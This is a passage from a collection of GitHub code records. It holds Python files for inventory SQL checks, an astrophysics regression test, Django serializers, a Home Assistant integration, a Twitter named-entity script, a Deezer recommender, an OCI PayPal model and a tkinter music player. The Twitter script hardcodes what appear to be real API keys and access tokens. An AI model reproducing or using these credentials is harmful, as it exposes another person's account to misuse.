panda_querry(\"\"\"\nSELECT prod_woo.Symbol, prod_subiekt.Symbol as Symbol_Sub, prod_woo.Nazwa , prod_woo.Stan as Stan_Online, \nprod_subiekt.Stan as Stan_Local FROM prod_woo\nLEFT JOIN prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Symbol is NULL\nORDER BY prod_woo.Nazwa\n\"\"\",)\n# checking for differences of overall number of products\nif row_count_sub != row_count_woo:\n print('\\n''The number of products in Databases does NOT match')\n print('Woo Database products count: {}'.format(row_count_woo))\n print('Subiekt Database products count: {}'.format(row_count_sub))\n print('Check those products:','\\n', df_diff_stock)\n print('Also check newly added products in Woo Store')\nelse:\n print('\\n''Overall number of products MATCH')\n\n# checking if number of out of stock match\nif out_of_stock_woo == out_of_stock_sub:\n print('\\n''Quantity differences CHECKED')\nelse:\n print('Run the SKU_Check to check symbols')\n\ncursor.close()\nconn.close()", "repo_name": "dredd85/Subiekt_Woocommerce", "sub_path": "3.Qty_Check.py", "file_name": "3.Qty_Check.py", "file_ext": "py", "file_size_in_byte": 3304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "10454699648", "text": "# regression test for time dependent H2 chemistry\n\n# Modules\nimport os\nimport athena_read # utilities for reading Athena++ data\nimport logging\nimport numpy as np # standard Python module for numerics\nimport sys # standard Python module to change path\nimport scripts.utils.athena as athena # utilities for running Athena++\nsys.path.insert(0, '../../vis/python') # insert path to Python read scripts\nlogger = logging.getLogger('athena' + __name__[7:]) # set logger name based on module\n\n\ndef prepare(**kwargs):\n try:\n if os.environ['CXX']:\n cxx = os.environ['CXX']\n else:\n cxx = 'g++'\n except KeyError:\n cxx = 'g++'\n athena.configure(\n prob='chem_uniform',\n chemistry='H2',\n cxx=cxx,\n eos='isothermal',\n cvode_path=os.environ['CVODE_PATH']\n )\n athena.make()\n\n\ndef run(**kwargs):\n arguments = [\n 'chemistry/output_zone_sec=0',\n ]\n athena.run('chemistry/athinput.chem_H2', arguments)\n\n\ndef analyze():\n def get_H(t_code, unit_length_in_cm=3.085678e+18, unit_vel_in_cms=1.0e5,\n f_H_0=1., n=100., xi_cr=2.0e-16, k_gr=3.0e-17):\n \"\"\"theoretical abundance of atomic hydrogen over time.\n input:\n t_code: time in code units, float or array\n optional parameters:\n unit_length_in_cm: code units of length, default 1pc\n unit_vel_in_cms: code units of velocity, default 1km/s\n f_H_0: initial atomic hydrogen abundance, default 1.\n n: density in cm-3, default 100\n xi_cr: primary cosmic-ray ionization rate in s-1H-1, default 2.0e-16\n k_gr: grain surface recombination rate of H2, default 3.0e-17.\n output:\n H abundance, float or array, between 0. 
and 1.\"\"\"\n k_cr = xi_cr * 3.\n a1 = k_cr + 2.*n*k_gr\n a2 = k_cr\n t = t_code * (unit_length_in_cm / unit_vel_in_cms)\n f_H = (f_H_0 - a2/a1)*np.exp(-t*a1) + a2/a1\n return f_H\n\n # maximum error allowed\n err_control = 1.0e-4\n # athena++ output\n fn_hst = \"bin/chem_H2.hst\"\n data_hst = athena_read.hst(fn_hst)\n # theoretical abundances\n f_H = get_H(data_hst[\"time\"], n=100.)\n\n diff = f_H - data_hst[\"H\"]/data_hst[\"mass\"]\n err_max = abs(diff/f_H).max()\n print(\"err_max={:.2e}\".format(err_max))\n\n if err_max < err_control:\n return True\n else:\n return False\n", "repo_name": "doraemonho/Athena_UNM", "sub_path": "tst/regression/scripts/tests/chemistry/chem_H2.py", "file_name": "chem_H2.py", "file_ext": "py", "file_size_in_byte": 2538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "scripts.utils.athena.configure", "line_number": 22, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 22, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scripts.utils.athena.make", "line_number": 29, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 29, "usage_type": "name"}, {"api_name": "scripts.utils.athena.run", "line_number": 36, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "athena_read.hst", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "2086015588", "text": "from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom project.models import *\nfrom rest_framework.exceptions import APIException\nfrom partners.models import *\n\n\nclass ProjectDetailsSerializer(ModelSerializer):\n created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model=ProjectDetails\n fields='__all__'\n\nclass AddProjectVentureSerializer(ModelSerializer):\n patners = serializers.ListField(required=False)\n class Meta:\n model=ProjectDetails\n fields=['id','venture','patners']\n\n def update(self, instance, validated_data):\n try:\n patners = validated_data.pop('patners')\n instance.venture = validated_data.get('venture', instance.venture)\n project_id = instance.id\n instance.save()\n if validated_data.get('venture') and patners:\n for jv in patners:\n partner_percentage = jv.pop('partner_percentage')\n partner_details = PartnerDetails.objects.get_or_create(**jv)\n print('partner_details:', partner_details)\n JointVenture.objects.get_or_create(partner = partner_details[0],\n project_id = project_id,\n partner_percentage=partner_percentage)\n return instance\n except Exception as error:\n raise APIException({\n 'msg': error,\n 'success': 0\n })", "repo_name": "MilonChowdhury/shyam_infra", "sub_path": "project/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"rest_framework.serializers.ModelSerializer", "line_number": 8, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HiddenField", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CurrentUserDefault", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ListField", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "37562443060", "text": "\"\"\"The motion_blinds component.\"\"\"\nimport asyncio\nfrom datetime import timedelta\nimport logging\nfrom socket import timeout\n\nfrom motionblinds import MotionMulticast\n\nfrom homeassistant import config_entries, core\nfrom homeassistant.const import CONF_API_KEY, CONF_HOST, EVENT_HOMEASSISTANT_STOP\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers import device_registry as dr\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\n\nfrom .const import (\n DOMAIN,\n KEY_COORDINATOR,\n KEY_GATEWAY,\n KEY_MULTICAST_LISTENER,\n MANUFACTURER,\n MOTION_PLATFORMS,\n)\nfrom .gateway import ConnectMotionGateway\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup(hass: core.HomeAssistant, config: dict):\n \"\"\"Set up the Motion Blinds component.\"\"\"\n return True\n\n\nasync def async_setup_entry(\n hass: core.HomeAssistant, entry: config_entries.ConfigEntry\n):\n \"\"\"Set up the motion_blinds components from a config entry.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n host = entry.data[CONF_HOST]\n key = entry.data[CONF_API_KEY]\n\n # Create multicast Listener\n if KEY_MULTICAST_LISTENER not in hass.data[DOMAIN]:\n multicast = MotionMulticast()\n hass.data[DOMAIN][KEY_MULTICAST_LISTENER] = multicast\n # start listening for local pushes (only once)\n await hass.async_add_executor_job(multicast.Start_listen)\n\n # register stop callback to shutdown listening for local pushes\n def stop_motion_multicast(event):\n \"\"\"Stop multicast thread.\"\"\"\n _LOGGER.debug(\"Shutting down Motion Listener\")\n multicast.Stop_listen()\n\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_motion_multicast)\n\n # Connect to motion gateway\n multicast = hass.data[DOMAIN][KEY_MULTICAST_LISTENER]\n connect_gateway_class = ConnectMotionGateway(hass, multicast)\n if not await connect_gateway_class.async_connect_gateway(host, key):\n raise ConfigEntryNotReady\n motion_gateway = connect_gateway_class.gateway_device\n\n def update_gateway():\n \"\"\"Call all updates using one async_add_executor_job.\"\"\"\n motion_gateway.Update()\n for blind in motion_gateway.device_list.values():\n try:\n blind.Update()\n except timeout:\n # let the error be logged and handled by the motionblinds library\n pass\n\n async def async_update_data():\n \"\"\"Fetch data from the gateway and blinds.\"\"\"\n try:\n await hass.async_add_executor_job(update_gateway)\n except timeout:\n # let the error be logged and handled by the motionblinds library\n pass\n\n coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n # Name of the data. For logging purposes.\n name=entry.title,\n update_method=async_update_data,\n # Polling interval. 
Will only be polled if there are subscribers.\n update_interval=timedelta(seconds=600),\n )\n\n # Fetch initial data so we have data when entities subscribe\n await coordinator.async_refresh()\n\n hass.data[DOMAIN][entry.entry_id] = {\n KEY_GATEWAY: motion_gateway,\n KEY_COORDINATOR: coordinator,\n }\n\n device_registry = await dr.async_get_registry(hass)\n device_registry.async_get_or_create(\n config_entry_id=entry.entry_id,\n connections={(dr.CONNECTION_NETWORK_MAC, motion_gateway.mac)},\n identifiers={(DOMAIN, entry.unique_id)},\n manufacturer=MANUFACTURER,\n name=entry.title,\n model=\"Wi-Fi bridge\",\n sw_version=motion_gateway.protocol,\n )\n\n for component in MOTION_PLATFORMS:\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, component)\n )\n\n return True\n\n\nasync def async_unload_entry(\n hass: core.HomeAssistant, config_entry: config_entries.ConfigEntry\n):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = all(\n await asyncio.gather(\n *[\n hass.config_entries.async_forward_entry_unload(config_entry, component)\n for component in MOTION_PLATFORMS\n ]\n )\n )\n\n if unload_ok:\n hass.data[DOMAIN].pop(config_entry.entry_id)\n\n if len(hass.data[DOMAIN]) == 1:\n # No motion gateways left, stop Motion multicast\n _LOGGER.debug(\"Shutting down Motion Listener\")\n multicast = hass.data[DOMAIN].pop(KEY_MULTICAST_LISTENER)\n await hass.async_add_executor_job(multicast.Stop_listen)\n\n return unload_ok\n", "repo_name": "fpetillo/home-assistant", "sub_path": "homeassistant/components/motion_blinds/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 4571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 28, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 28, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 34, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 34, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 34, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 34, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 37, "usage_type": "argument"}, {"api_name": "homeassistant.const.CONF_HOST", "line_number": 38, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_API_KEY", "line_number": 39, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 42, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 42, "usage_type": "name"}, {"api_name": "motionblinds.MotionMulticast", "line_number": 43, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 44, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 44, "usage_type": "name"}, {"api_name": "homeassistant.const.EVENT_HOMEASSISTANT_STOP", "line_number": 54, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 57, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 57, "usage_type": "name"}, {"api_name": "gateway.ConnectMotionGateway", "line_number": 58, "usage_type": "call"}, {"api_name": "homeassistant.exceptions.ConfigEntryNotReady", "line_number": 60, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 69, "usage_type": 
"name"}, {"api_name": "socket.timeout", "line_number": 77, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.DataUpdateCoordinator", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 88, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 94, "usage_type": "name"}, {"api_name": "const.KEY_GATEWAY", "line_number": 95, "usage_type": "name"}, {"api_name": "const.KEY_COORDINATOR", "line_number": 96, "usage_type": "name"}, {"api_name": "homeassistant.helpers.device_registry.async_get_registry", "line_number": 99, "usage_type": "call"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 99, "usage_type": "name"}, {"api_name": "homeassistant.helpers.device_registry.CONNECTION_NETWORK_MAC", "line_number": 102, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 102, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 103, "usage_type": "name"}, {"api_name": "const.MANUFACTURER", "line_number": 104, "usage_type": "name"}, {"api_name": "const.MOTION_PLATFORMS", "line_number": 110, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 119, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 119, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 119, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 119, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 123, "usage_type": "call"}, {"api_name": "const.MOTION_PLATFORMS", "line_number": 126, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 132, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 134, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 137, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "19343239836", "text": "import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom src.window import MainWindow\nimport matlab.engine\nfrom importlib import reload\nfrom calibrate import Calibrate\n\nreload(sys)\n\n\ndef main():\n print(\"Start MatLabEngine:\\n \")\n eng = matlab.engine.start_matlab()\n print(\"Start Calibrate:\\n \")\n Calibrate.calibrate(eng)\n print(\"Start e-book reader:\\n \")\n app = QApplication(sys.argv)\n window = MainWindow(eng)\n window.show()\n qt_return_code = app.exec_()\n print('Qt return code:' + str(qt_return_code))\n sys.exit(qt_return_code)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "KarlRong/Eye-controlled-e-reader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.reload", "line_number": 8, "usage_type": "call"}, {"api_name": "matlab.engine.engine.start_matlab", "line_number": 13, "usage_type": "call"}, {"api_name": "matlab.engine.engine", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matlab.engine", "line_number": 13, "usage_type": "name"}, {"api_name": "calibrate.Calibrate.calibrate", "line_number": 15, "usage_type": "call"}, {"api_name": "calibrate.Calibrate", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, 
{"api_name": "src.window.MainWindow", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "24605213401", "text": "# PARTIE IMPORTATION\r\n\r\nimport tweepy\r\nimport os\r\nimport nltk\r\nfrom nltk.tag import StanfordNERTagger\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n\r\n# ON REGLE LES CHEMINS DE DIRECTION\r\n\r\nnltk.internals.config_java(\"C:/Program Files (x86)/Java/jre1.8.0_211/bin/java.exe\")\r\njava_path = \"C:/Program Files (x86)/Java/jre1.8.0_211/bin/java.exe\"\r\nos.environ['JAVAHOME'] = java_path\r\nst = StanfordNERTagger('C:/Users/TheoLC/Desktop/python/stanford/classifiers/english.all.3class.distsim.crf.ser.gz','C:/Users/TheoLC/Desktop/python/stanford/stanford-ner.jar',encoding='utf-8')\r\n\r\n\r\n\r\n# ON S'AUTHENTIFIE API TWITTER\r\n\r\nauth = tweepy.OAuthHandler(\"NLZ39ilLBflHHt8myenHdH3Ao\", \"FJ5EAa7DMtnrUHPFNXMuG0heucpzZPatYJNjoixFniWMK8WM0o\")\r\nauth.set_access_token(\"1117700066255474688-5BSckADfdnZTX1WAgTBQib1tnEXBMO\", \"eiTGX94V9NRpXr9cI5j29oR59MzVp1NeVhHNKCrl4xEWl\")\r\napi = tweepy.API(auth, wait_on_rate_limit = True)\r\n\r\n# VIF DU SUJET\r\n\r\nsearch_word = input(\"entrer le mot que vous chercher : \")\r\n\r\ndate_since = \"2019-04-01\"\r\n\r\ntweets = tweepy.Cursor(api.search, q = search_word, lang = \"en\", since = date_since).items(1)\r\n\r\ntweets_text = [[tweet.text] for tweet in tweets]\r\n\r\ndata_final = str(tweets_text)\r\n\r\ntokenized_text = word_tokenize(data_final) # On divise la phrase morceau par morceau, en tokens\r\nclassified_text = st.tag(tokenized_text)\r\n\r\nprint(classified_text)\r\n", "repo_name": "atwika/python_finland", "sub_path": "twitter_search/stanford_twitter.py", "file_name": "stanford_twitter.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.internals.config_java", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.internals", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nltk.tag.StanfordNERTagger", "line_number": 15, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 23, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "15377596105", "text": "import requests\n\n\n'''\n $$$$$$\\ $$\\ $$\\ $$\\ $$\\ \n$$ __$$\\ $$ |$$ | \\__| $$ | \n$$ / \\__| $$$$$$\\ $$\\ $$\\ $$$$$$$\\ $$$$$$$ |$$ | $$\\ $$$$$$$\\ $$ | $$\\ \n\\$$$$$$\\ $$ __$$\\ $$ | $$ |$$ __$$\\ $$ __$$ |$$ | $$ |$$ __$$\\ $$ | $$ |\n \\____$$\\ $$ / $$ |$$ | $$ |$$ | $$ |$$ / $$ |$$ | $$ |$$ | $$ |$$$$$$ / \n$$\\ $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ _$$< \n\\$$$$$$ |\\$$$$$$ |\\$$$$$$ |$$ | $$ |\\$$$$$$$ |$$$$$$$$\\ $$ |$$ | $$ |$$ | \\$$\\ \n \\______/ \\______/ \\______/ \\__| \\__| \\_______|\\________|\\__|\\__| \\__|\\__| \\__|\n \n \n'''\n\nclass Band:\n def __init__(self, api_key):\n self.api_key = api_key\n self.headers = {'User-Agent': 'Mozilla/5.0'}\n\n def recommend_similar_bands(self, query, limit=10):\n base_url = 'https://api.deezer.com/search/artist'\n params = {\n 'q': query,\n 'output': 'json',\n 'limit': 1 # Limit to 1 result for the initial query\n }\n\n try:\n response = 
requests.get(base_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artist_id = data.get('data', [])[0].get('id')\n\n similar_url = f'https://api.deezer.com/artist/{artist_id}/related'\n params = {\n 'limit': limit,\n 'output': 'json'\n }\n\n response = requests.get(similar_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artists = data.get('data', [])\n\n print(f\"Recommended similar bands to '{query}':\")\n for i, artist in enumerate(artists[:limit], 1):\n name = artist['name']\n print(f\"{i}. {name}\")\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred: {e}\")\n\nclass Song:\n def __init__(self, api_key):\n self.api_key = api_key\n self.headers = {'User-Agent': 'Mozilla/5.0'}\n\n def recommend_songs(self, query, limit=10):\n base_url = 'https://api.deezer.com/search'\n params = {\n 'q': query,\n 'output': 'json',\n 'limit': 1\n }\n\n try:\n response = requests.get(base_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artist_id = data.get('data', [])[0].get('artist', {}).get('id')\n\n tracks_url = f'https://api.deezer.com/artist/{artist_id}/top'\n params = {\n 'limit': limit,\n 'output': 'json'\n }\n\n response = requests.get(tracks_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n tracks = data.get('data', [])\n\n print(f\"Recommended songs from {query} in order of relevance:\")\n recommended_songs = set()\n for i, track in enumerate(tracks[:limit], 1):\n artist = track['artist']['name']\n title = track['title']\n song = f\"{artist} - {title}\"\n if song not in recommended_songs:\n print(f\"{i}. {song}\")\n recommended_songs.add(song)\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred: {e}\")\n\n\n\n\ndef get_band_recommendations(query, limit, api_key):\n api_key = api_key\n __recommendation = Band(api_key).recommend_similar_bands(query, limit)\n return __recommendation\n\n\ndef get_song_recommendations(query, limit, api_key):\n api_key = api_key\n __recommendation = Song(api_key).recommend_songs(query, limit)\n return __recommendation\n", "repo_name": "tudor-Spaima/SoundLink", "sub_path": "lib/soundlink.py", "file_name": "soundlink.py", "file_ext": "py", "file_size_in_byte": 4068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "31601793019", "text": "from .payment_option import PaymentOption\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass PaypalPaymentOption(PaymentOption):\n \"\"\"\n PayPal Payment related details\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new PaypalPaymentOption object with values from keyword arguments. 
The default value of the :py:attr:`~oci.osp_gateway.models.PaypalPaymentOption.payment_method` attribute\n of this class is ``PAYPAL`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param wallet_instrument_id:\n The value to assign to the wallet_instrument_id property of this PaypalPaymentOption.\n :type wallet_instrument_id: str\n\n :param wallet_transaction_id:\n The value to assign to the wallet_transaction_id property of this PaypalPaymentOption.\n :type wallet_transaction_id: str\n\n :param payment_method:\n The value to assign to the payment_method property of this PaypalPaymentOption.\n Allowed values for this property are: \"CREDIT_CARD\", \"PAYPAL\"\n :type payment_method: str\n\n :param email_address:\n The value to assign to the email_address property of this PaypalPaymentOption.\n :type email_address: str\n\n :param first_name:\n The value to assign to the first_name property of this PaypalPaymentOption.\n :type first_name: str\n\n :param last_name:\n The value to assign to the last_name property of this PaypalPaymentOption.\n :type last_name: str\n\n :param ext_billing_agreement_id:\n The value to assign to the ext_billing_agreement_id property of this PaypalPaymentOption.\n :type ext_billing_agreement_id: str\n\n \"\"\"\n self.swagger_types = {\n 'wallet_instrument_id': 'str',\n 'wallet_transaction_id': 'str',\n 'payment_method': 'str',\n 'email_address': 'str',\n 'first_name': 'str',\n 'last_name': 'str',\n 'ext_billing_agreement_id': 'str'\n }\n\n self.attribute_map = {\n 'wallet_instrument_id': 'walletInstrumentId',\n 'wallet_transaction_id': 'walletTransactionId',\n 'payment_method': 'paymentMethod',\n 'email_address': 'emailAddress',\n 'first_name': 'firstName',\n 'last_name': 'lastName',\n 'ext_billing_agreement_id': 'extBillingAgreementId'\n }\n\n self._wallet_instrument_id = None\n self._wallet_transaction_id = None\n self._payment_method = None\n self._email_address = None\n self._first_name = None\n self._last_name = None\n self._ext_billing_agreement_id = None\n self._payment_method = 'PAYPAL'\n\n @property\n def email_address(self):\n \"\"\"\n Gets the email_address of this PaypalPaymentOption.\n The email address of the paypal user.\n\n\n :return: The email_address of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._email_address\n\n @email_address.setter\n def email_address(self, email_address):\n \"\"\"\n Sets the email_address of this PaypalPaymentOption.\n The email address of the paypal user.\n\n\n :param email_address: The email_address of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._email_address = email_address\n\n @property\n def first_name(self):\n \"\"\"\n Gets the first_name of this PaypalPaymentOption.\n First name of the paypal user.\n\n\n :return: The first_name of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._first_name\n\n @first_name.setter\n def first_name(self, first_name):\n \"\"\"\n Sets the first_name of this PaypalPaymentOption.\n First name of the paypal user.\n\n\n :param first_name: The first_name of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._first_name = first_name\n\n @property\n def last_name(self):\n \"\"\"\n Gets the last_name of this PaypalPaymentOption.\n Last name of the paypal user.\n\n\n :return: The last_name of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._last_name\n\n @last_name.setter\n def last_name(self, last_name):\n \"\"\"\n Sets the last_name of this 
+{"seq_id": "36612135996", "text": "import os\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nfrom pygame import mixer\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\n\r\nfrom mutagen.mp3 import MP3\r\nimport threading\r\nimport time\r\n\r\n\r\nmixer.init()\r\n\r\nroot = tk.ThemedTk()\r\n\r\nroot.get_themes()\r\nroot.set_theme(\"winxpblue\")\r\n#radiance\r\n\r\nroot.title(\"Music Player\")\r\nroot.geometry(\"600x430+0+0\")\r\nroot.resizable(False, False)\r\nroot.iconbitmap(r'music-player.ico')\r\n\r\nfile = ttk.Label(root, text=\"MP3 Player\", relief=GROOVE, font=(\"times new roman\", 30, 'bold'))\r\nfile.place(x=180, y=10)\r\n\r\nfile_length = ttk.Label(root, text=\"Total length 00 : 00\", relief=GROOVE, font=(\"times new roman\", 15, 'bold'))\r\nfile_length.place(x=295, y=105)\r\n\r\ncurrent_time = ttk.Label(root, text=\"Current Time 00 : 00\",relief=GROOVE, font=(\"times new roman\", 12, 'bold'))\r\ncurrent_time.place(x=305, y=145)\r\n\r\n\r\nsongs = ttk.Label(root, text=\"Song List\", font=(\"Times new roman\", 18, 'bold '))\r\nsongs.place(x=40, y=78)\r\nlistbox = Listbox(root, width=31, height=13, font=('times new roman', 10, 'bold'))\r\nlistbox.place(x=40, y=111)\r\n\r\n\r\n\r\n\r\nplay_img = PhotoImage(file=\"play.png\")\r\npause_img = PhotoImage(file=\"pause.png\")\r\nstop_img = PhotoImage(file=\"Stop.png\")\r\nspeaker_img = PhotoImage(file=\"speaker.png\")\r\nmute_img = PhotoImage(file=\"Mute.png\")\r\n\r\n\r\nsong_list = []\r\n\r\ndef Browse_file():\r\n global file_path\r\n file_path = filedialog.askopenfilename()\r\n\r\n add_to_list(file_path)\r\n\r\n\r\ndef add_to_list(f):\r\n index = 0\r\n f = os.path.basename(f)\r\n listbox.insert(index, f)\r\n song_list.insert(0, file_path)\r\n index += 1\r\n\r\n\r\n\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\nsubMenus = Menu(menubar, tearoff=0)\r\nsubMenuss = Menu(menubar, tearoff=0)\r\n\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nmenubar.add_cascade(label=\"View\", menu=subMenus)\r\nmenubar.add_cascade(label=\"Exit\", menu=subMenuss)\r\n\r\nsubMenu.add_command(label=\"Open File\", command=Browse_file)\r\nsubMenus.add_command(label=\"View\", command=lambda: print(\"This is view section\"))\r\n\r\n\r\n\r\ndef song_details(file):\r\n\r\n file_data = os.path.splitext(file)\r\n\r\n if file_data[1] == \".mp3\":\r\n audio = MP3(file)\r\n length = audio.info.length\r\n\r\n else:\r\n a = mixer.Sound(file)\r\n length = a.get_length()\r\n\r\n\r\n mins, sec = divmod(length, 60)\r\n mins = round(mins)\r\n sec = round(sec)\r\n\r\n timeformat = '{:02d} : {:02d}'.format(mins, sec)\r\n\r\n file_length['text'] = \"Total length \" + timeformat\r\n #start_counter(length)\r\n\r\n\r\n t1 = threading.Thread(target=start_counter, args=(length,))\r\n t1.start()\r\n\r\n\r\n\r\n\r\n\r\ndef start_counter(t):\r\n\r\n while t and mixer.music.get_busy():\r\n mins, sec = divmod(t, 60)\r\n mins = round(mins)\r\n sec = round(sec)\r\n currentFormat = '{:02d} : {:02d}'.format(mins, sec)\r\n\r\n current_time['text'] = \"Current time \" + currentFormat\r\n time.sleep(1)\r\n t -= 